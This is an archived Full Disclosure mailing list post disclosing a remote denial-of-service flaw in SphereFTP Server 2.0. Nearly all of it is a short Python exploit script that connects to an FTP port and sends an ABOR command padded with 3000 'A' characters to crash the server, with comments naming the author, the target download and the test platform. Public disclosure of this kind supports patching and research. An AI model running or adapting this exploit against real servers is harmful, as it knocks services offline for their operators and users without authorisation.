[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] SphereFTP 2.0 Denial Of Service
From: Sachin Wagh <wsachin092 () gmail ! com>
Date: 2019-04-04 4:45:54
Message-ID: CALCpQr8mH6qNfeBUq+YUTOY8j-cg2G5zAF+8zFhBLGtx8GPrEw () mail ! gmail ! com
[Download RAW message or body]
#!/usr/bin/python
# Exploit Title: SphereFTP Server v2.0 Remote Denial of Service
Vulnerability
# Date: 2019-31-03
# Exploit Author: Sachin Wagh (@tiger_tigerboy)
# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
# Tested on: Windows 10 64-bit
import socket
import sys
evil = "A"*3000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.1',21))
s.recv(1024)
s.send('ABOR '+evil+'\r\n')
s.recv(1024)
s.close
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic